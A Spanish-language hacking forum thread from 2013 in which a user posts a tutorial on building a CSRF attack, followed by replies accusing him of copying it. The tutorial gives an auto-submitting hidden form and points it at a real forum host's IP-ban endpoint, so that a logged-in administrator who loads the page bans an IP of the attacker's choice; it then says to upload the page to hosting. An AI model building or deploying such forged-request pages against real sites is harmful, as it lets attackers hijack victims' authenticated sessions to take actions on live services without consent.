send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[TUTORIAL] Como crear tu csrf

  • 4 Respuestas
  • 2331 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Windero

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 23, 2013, 07:44:15 pm »
Introducción:

Un ataque CSRF fuerza al navegador web validado de una víctima a enviar una petición a una aplicación web vulnerable, la cual entonces realiza la acción elegida a través de la víctima. Al contrario que en los ataques XSS, los cuales explotan la confianza que un usuario tiene en un sitio en particular, el cross site request forgery (CSRF) explota la confianza que un sitio tiene en un usuario en particular.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Explicando:

Lo primero es encontrar una web vulnerable a csrf, yo usare mi@ ya que esta plagada de ellos exactamente este formulario:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ese es el formulario que usare en el post, el csrf del ejemplo aplica el baneo de ip es decir puedes banear a cualquier usuario por ip un máximo de 30 días de cualquier foro mi@, recomiendo crear tu foro y probarlo desde ahí.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Lo primero para ayudar a entender el código mejor, y su posterior publicación recomiendo crearlo en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vez abierto pastebin copiamos esta estructura del csrf:

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="modificar" method=post name="csrf1">
  8. <input type="hidden" name="modificar" value="modificar">
  9. <input type="hidden" name="modificar" value="modificar">
  10. <input type="hidden" name="modificar" value="modificar">
  11. <input type="hidden" name="modificar" value="modificar">
  12. <body onload="envio_csrf()">


La web vulnerable ahí que ponerla en esta linea:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<form action="http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new" method=post name="csrf1">
Ahora entramos al formulario en mi caso el de baneo, y en los ''textos'' donde escribes los datos inspeccionamos el elemento, y buscamos name="modificar" value="modificar" en el apartado modificar en cada web saldrá una palabra distinta, en mi caso es ip y motivo en los 2 textbox.





Ahora en la linea del csrf la modificamos y quedaría así:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<input type="hidden" name="ip" value="Aquí iría la ip que quisiéramos banear">
Y así sucesivamente con todos los textbox, en name el que te de el código fuente y en value lo que tu quieras que se ponga en el textbox


Y para finalizar el mas importante el de botón de continuar ya que sin eso, no se podría hacer que funcione, es lo mismo:

Inspeccionamos elemento del botón, y nos dará (en mi@):



Con esos datos la parte del csrf quedaría (que seria la ultima linea):

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<input type="hidden" name="boton_continuar" value="continuar">
Con eso terminaríamos el csrf, y solo quedaría guardarlo en php y subirlo en algún hosting.
« Última modificación: Agosto 23, 2013, 07:49:10 pm por ndk »
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #1 en: Agosto 23, 2013, 10:45:20 pm »
Estás rippeando los posts de el foro You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, coloca la fuente por favor.

Saludos ;).
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #2 en: Agosto 23, 2013, 10:45:55 pm »
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #3 en: Agosto 24, 2013, 06:14:27 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Tienes mucha razón yo ya le advertí en otro tema, y sigue igual.

Un saludo.

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #4 en: Agosto 24, 2013, 08:09:05 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Morenito te equivocas el post es mio, no de rare jaja ;)

Si algun mod o adm puede poner el autor original lo agradecería

 

¿Te gustó el post? COMPARTILO!



Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 5872
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
[VIDEO] Como subir una shell a Wordpress

Iniciado por unkdown

Respuestas: 2
Vistas: 2089
Último mensaje Diciembre 13, 2015, 07:12:12 pm
por Gabriela
Como Encontrar el AdminPanel (Algunos Metodos)

Iniciado por hdbreaker

Respuestas: 4
Vistas: 2858
Último mensaje Junio 25, 2012, 03:34:37 pm
por Satyricon
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4226
Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX
¿Que es un Buffer Overflow?¿Como explotarlo?

Iniciado por HckDrk

Respuestas: 3
Vistas: 2420
Último mensaje Noviembre 24, 2012, 07:21:39 am
por Pr0ph3t